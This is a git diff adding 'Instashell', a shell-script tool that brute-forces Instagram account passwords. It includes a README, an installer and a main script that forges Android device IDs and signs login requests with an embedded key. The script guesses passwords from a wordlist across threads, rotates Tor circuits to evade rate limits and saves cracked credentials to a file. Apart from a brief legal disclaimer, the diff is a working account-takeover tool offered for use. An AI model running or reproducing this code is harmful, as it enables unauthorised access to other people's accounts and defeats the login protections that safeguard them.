tiptoettt · peter-wachira · Mar 18, 2018 · Mar 18, 2018 · Mar 18, 2018 · Mar 18, 2018
diff --git a/LICENSE b/LICENSE
@@ -1,3 +1,6 @@
+  GNU LICENSE FOR INSTASHELL, AUTHOR: @thelinuxchoice
+  Downloaded from: https://github.com/thelinuxchoice/instashell
+
                     GNU GENERAL PUBLIC LICENSE
                        Version 3, 29 June 2007
 

diff --git a/README.md b/README.md
@@ -1,2 +1,44 @@
-# instashell
-Instagram Brute Forcer without password limit
+# Instashell v1.5.4
+## Author: github.com/thelinuxchoice
+## IG: instagram.com/thelinuxchoice
+### Don't copy this code without give me the credits, nerd! 
+Instashell is an Shell Script to perform multi-threaded brute force attack against Instagram, this script can bypass login limiting and it can test infinite number of passwords with a rate of +400 passwords/min using 20 threads.
+
+## Legal disclaimer:
+Usage of InstaShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
+
+![insta](https://user-images.githubusercontent.com/34893261/37858917-a6f23ae2-2eea-11e8-9f58-9a688390cfb0.png)
+
+### Features
+- Multi-thread (400 pass/min, 20 threads)
+- Save/Resume sessions
+- Anonymous attack through TOR
+- Check valid usernames
+- Default password list (best +39k 8 letters)
+- Check and Install all dependencies
+
+### Usage:
+```
+git clone https://github.com/thelinuxchoice/instashell
+cd instashell
+chmod +x instashell.sh
+service tor start
+sudo ./instashell.sh
+```
+
+### Install requirements (Curl, Tor, Openssl):
+
+```
+chmod +x install.sh
+sudo ./install.sh
+```
+
+### How it works?
+
+Script uses an Android ApkSignature to perform authentication in addition using TOR and rotating the ip address to avoid blocking. 
+The script uses Instagram-py algorithm, see the project at: https://github.com/antony-jr/instagram-py
+
+### Donate!
+Support the authors:
+
+<noscript><a href="https://liberapay.com/thelinuxchoice/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a></noscript>
diff --git a/install.sh b/install.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+#Author: github.com/thelinuxchoice
+#Instagram: @thelinuxchoice
+trap 'echo exiting cleanly...; exit 1;' SIGINT SIGTSTP
+
+checkroot() {
+
+if [[ "$(id -u)" -ne 0 ]]; then
+   printf "\e[1;77mPlease, run this program as root!\n\e[0m"
+   exit 1
+fi
+
+}
+
+checkroot
+
+(trap '' SIGINT SIGTSTP && command -v tor > /dev/null 2>&1 || { printf >&2  "\e[1;92mInstalling TOR, please wait...\n\e[0m"; apt-get update > /dev/null && apt-get -y install tor > /dev/null || printf "\e[1;91mTor Not installed.\n\e[0m"; }) & wait $!
+
+(trap '' SIGINT SIGTSTP && command -v openssl > /dev/null 2>&1 || { printf >&2  "\e[1;92mInstalling openssl, please wait...\n\e[0m"; apt-get update > /dev/null && apt-get -y install openssl > /dev/null || printf "\e[1;91mOpenssl Not installed.\n\e[0m"; }) & wait $! 
+
+(trap '' SIGINT SIGTSTP && command -v curl > /dev/null 2>&1 || { printf >&2  "\e[1;92mInstalling cURL, please wait...\n\e[0m"; apt-get update > /dev/null && apt-get -y install curl > /dev/null || printf "\e[1;91mCurl Not installed.\n\e[0m"; }) & wait $!
+
+printf "\e[1;92mAll Requires are installed!\n\e[0m"
+
diff --git a/instashell.sh b/instashell.sh
@@ -1,12 +1,46 @@
 #!/bin/bash
-# Coded by @thelinuxchoice (Instagram)
+# Coded by: github.com/thelinuxchoice
+# Instagram: @linux_choice
+
+trap 'store;exit 1' 2
+string4=$(openssl rand -hex 32 | cut -c 1-4)
+string8=$(openssl rand -hex 32  | cut -c 1-8)
+string12=$(openssl rand -hex 32 | cut -c 1-12)
+string16=$(openssl rand -hex 32 | cut -c 1-16)
+device="android-$string16"
+uuid=$(openssl rand -hex 32 | cut -c 1-32)
+phone="$string8-$string4-$string4-$string4-$string12"
+guid="$string8-$string4-$string4-$string4-$string12"
+var=$(curl -i -s -H "$header" https://i.instagram.com/api/v1/si/fetch_headers/?challenge_type=signup&guid=$uuid > /dev/null)
+var2=$(echo $var | grep -o 'csrftoken=.*' | cut -d ';' -f1 | cut -d '=' -f2)
+
 checkroot() {
 if [[ "$(id -u)" -ne 0 ]]; then
     printf "\e[1;77mPlease, run this program as root!\n\e[0m"
     exit 1
 fi
 }
 
+dependencies() {
+
+command -v tor > /dev/null 2>&1 || { echo >&2 "I require tor but it's not installed. Run ./install.sh. Aborting."; exit 1; }
+command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Run ./install.sh. Aborting."; exit 1; }
+command -v openssl > /dev/null 2>&1 || { echo >&2 "I require openssl but it's not installed. Run ./install.sh Aborting."; exit 1; }
+
+command -v awk > /dev/null 2>&1 || { echo >&2 "I require awk but it's not installed. Aborting."; exit 1; }
+command -v sed > /dev/null 2>&1 || { echo >&2 "I require sed but it's not installed. Aborting."; exit 1; }
+command -v cat > /dev/null 2>&1 || { echo >&2 "I require cat but it's not installed. Aborting."; exit 1; }
+command -v tr > /dev/null 2>&1 || { echo >&2 "I require tr but it's not installed. Aborting."; exit 1; }
+command -v wc > /dev/null 2>&1 || { echo >&2 "I require wc but it's not installed. Aborting."; exit 1; }
+command -v cut > /dev/null 2>&1 || { echo >&2 "I require cut but it's not installed. Aborting."; exit 1; }
+command -v uniq > /dev/null 2>&1 || { echo >&2 "I require uniq but it's not installed. Aborting."; exit 1; }
+if [ $(ls /dev/urandom >/dev/null; echo $?) == "1" ]; then
+echo "/dev/urandom not found!"
+exit 1
+fi
+
+}
+
 banner() {
 
 printf "\e[1;92m     _                                   _             _  _           \e[0m\n"
@@ -16,90 +50,167 @@ printf "\e[1;92m ) )| ||  _ \  /___)(_   _)(____ | /___)|  _ \ | ___ || || |
 printf "\e[1;77m(_/ | || | | ||___ |  | |_ / ___ ||___ || | | || ____|| || |  _____   \e[0m\n"
 printf "\e[1;77m    |_||_| |_|(___/    \__)\_____|(___/ |_| |_||_____) \_)\_)(_____)  \e[0m\n"
 printf "\n"
-printf "\e[1;77m\e[45m                     Instagram Brute Forcer. Author: @thelinuxchoice\e[0m\n"
+printf "\e[1;77m\e[45m  Instagram Brute Forcer v1.5.5 Author: @linux_choice (Github/IG)   \e[0m\n"
 printf "\n"
 }
 
+function start() {
 banner
-checkroot
+#checkroot
+dependencies
 read -p $'\e[1;92mUsername account: \e[0m' user
-read -p $'\e[1;92mPassword List: \e[0m' wl_pass
+checkaccount=$(curl -L -s https://www.instagram.com/$user/ | grep -c "the page may have been removed")
+if [[ "$checkaccount" == 1 ]]; then
+printf "\e[1;91mInvalid Username! Try again\e[0m\n"
+sleep 1
+start
+else
+default_wl_pass="passwords.lst"
+read -p $'\e[1;92mPassword List (Enter to default list): \e[0m' wl_pass
+wl_pass="${wl_pass:-${default_wl_pass}}"
+default_threads="10"
+read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
+threads="${threads:-${default_threads}}"
+fi
+}
 
 checktor() {
 
-check=$(curl --socks5 localhost:9050 -s https://check.torproject.org > /dev/null; echo $?)
+check=$(curl --socks5-hostname localhost:9050 -s https://check.torproject.org > /dev/null; echo $?)
 
 if [[ "$check" -gt 0 ]]; then
-printf "\e[1;91mPlease, start TOR!\n\e[0m"
+printf "\e[1;91mPlease, check your TOR Connection! Just type tor or service tor start\n\e[0m"
 exit 1
 fi
 
 }
 
+function store() {
+
+if [[ -n "$threads" ]]; then
+printf "\e[1;91m [*] Waiting threads shutting down...\n\e[0m"
+if [[ "$threads" -gt 10 ]]; then
+sleep 6
+else
+sleep 3
+fi
+default_session="Y"
+printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $user
+read -p $'\e[1;77m? [Y/n]: \e[0m' session
+session="${session:-${default_session}}"
+if [[ "$session" == "Y" || "$session" == "y" || "$session" == "yes" || "$session" == "Yes" ]]; then
+if [[ ! -d sessions ]]; then
+mkdir sessions
+fi
+IFS=$'\n'
+countpass=$(grep -n -x "$pass" "$wl_pass" | cut -d ":" -f1)
+printf "user=\"%s\"\npass=\"%s\"\nwl_pass=\"%s\"\ntoken=\"%s\"\n" $user $pass $wl_pass $countpass > sessions/store.session.$user.$(date +"%FT%H%M")
+printf "\e[1;77mSession saved.\e[0m\n"
+printf "\e[1;92mUse ./instashell --resume\n"
+else
+exit 1
+fi
+else
+exit 1
+fi
+}
+
 
 function changeip() {
 
 killall -HUP tor
-sleep 3
 
-}
 
-string8=$(cat /dev/urandom | tr -dc 'az0-9' | fold -w 8 | head -n 1)
-string4=$(cat /dev/urandom | tr -dc 'az0-9' | fold -w 4 | head -n 1)
-string12=$(cat /dev/urandom | tr -dc 'az0-9' | fold -w 12 | head -n 1)
-string16=$(cat /dev/urandom | tr -dc 'az0-9' | fold -w 16 | head -n 1)
-device="android-$string16"
-uuid=$(cat /dev/urandom | tr -dc 'az0-9' | fold -w 32 | head -n 1)
-phone="$string8-$string4-$string4-$string4-$string12"
-guid="$string8-$string4-$string4-$string4-$string12"
-var=$(curl -i -s -H "$header" https://i.instagram.com/api/v1/si/fetch_headers/?challenge_type=signup&guid=$uuid > /dev/null)
-var2=$(echo $var | awk -F ';' '{print $2}' | cut -d '=' -f3)
-#echo $var2
+}
 
 function bruteforcer() {
 
 checktor
-for pass in $(cat $wl_pass); do
-
+count_pass=$(wc -l $wl_pass | cut -d " " -f1)
+printf "\e[1;92mUsername:\e[0m\e[1;77m %s\e[0m\n" $user
+printf "\e[1;92mWordlist:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass
+printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
+token=0
+startline=1
+endline="$threads"
+while [[ "$token" -lt "$count_pass" ]]; do
+IFS=$'\n'
+for pass in $(sed -n ''$startline','$endline'p' $wl_pass); do
 header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
 
-data='{"phone_id":"$phone", "_csrftoken":"$var2", "username":"'$user'", "guid":"$guid", "device_id":"$device", "password":"'$pass'", "login_attempt_count":"0"}'
+data='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass'", "login_attempt_count":"0"}'
 ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178"
+IFS=$'\n'
+countpass=$(grep -n -x "$pass" "$wl_pass" | cut -d ":" -f1)
+hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
+useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
 
+let token++
+printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass #token
 
-hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
-printf "\e[1;77mTrying pass\e[0m: %s\n" $pass
-check=$(curl --socks5 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o '200\|challenge\|many tries\|Please wait' | uniq)
-#echo $check
-if [[ "$check" == "200" ]]; then
-printf "\e[1;92m [*] Password Found: %s \n\e[0m" $pass
-printf "Username: %s, Password: %s\n" $user $pass >> found.instashell
-printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"
+{(trap '' SIGINT && var=$(curl --socks5-hostname 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$  ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!;
+
+let startline+=$threads
+let endline+=$threads
+changeip
+done
 exit 1
-fi
+}
 
-if [[ "$check" == "challenge" ]]; then
-printf "\e[1;92m [*] Password Found: %s\n" $pass
-printf "\e[1;92m [*] Challenge required\n"
-printf "Username: %s, Password: %s\n" $user $pass >> found.instashell
-printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"
+
+
+function resume() {
+
+banner 
+checktor
+counter=1
+if [[ ! -d sessions ]]; then
+printf "\e[1;91m[*] No sessions\n\e[0m"
 exit 1
 fi
+printf "\e[1;92mFiles sessions:\n\e[0m"
+for list in $(ls sessions/store.session*); do
+IFS=$'\n'
+source $list
+printf "\e[1;92m%s \e[0m\e[1;77m: %s (\e[0m\e[1;92mwl:\e[0m\e[1;77m %s\e[0m\e[1;92m,\e[0m\e[1;92m lastpass:\e[0m\e[1;77m %s )\n\e[0m" "$counter" "$list" "$wl_pass" "$pass"
+let counter++
+done
+read -p $'\e[1;92mChoose a session number: \e[0m' fileresume
+source $(ls sessions/store.session* | sed ''$fileresume'q;d')
+default_threads=10
+read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
+threads="${threads:-${default_threads}}"
 
+printf "\e[1;92m[*] Resuming session for user:\e[0m \e[1;77m%s\e[0m\n" $user
+printf "\e[1;92m[*] Wordlist: \e[0m \e[1;77m%s\e[0m\n" $wl_pass
+printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
 
-if [[ "$check" == "many tries" ]]; then
 
-printf "\e[1;31m [*] Changing IP Address...\n\e[0m"
-changeip 
-fi
-if [[ "$check" == "Please wait" ]]; then
+count_pass=$(wc -l $wl_pass | cut -d " " -f1)
 
-printf "\e[1;31m [*] Changing IP Address...\n\e[0m"
-changeip 
-fi
+while [[ "$token" -lt "$count_pass" ]]; do
+IFS=$'\n'
+for pass in $(sed -n '/\b'$pass'\b/,'$(($token+threads))'p' $wl_pass); do
+#for pass in $(sed -n '/\b'$pass'\b/,'$threads'p' $wl_pass); do
+header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
 
+data='{"phone_id":"$phone", "_csrftoken":"$var2", "username":"'$user'", "guid":"$guid", "device_id":"$device", "password":"'$pass'", "login_attempt_count":"0"}'
+ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178"
+IFS=$'\n'
+countpass=$(grep -n -x "$pass" "$wl_pass" | cut -d ":" -f1)
+hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
+useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
+printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass #token
+let token++
+{(trap '' SIGINT && var=$(curl --socks5-hostname 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$  ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!;
+let token--
+changeip
 done
+exit 1
 }
 
+case "$1" in --resume) resume ;; *)
+start
 bruteforcer
+esac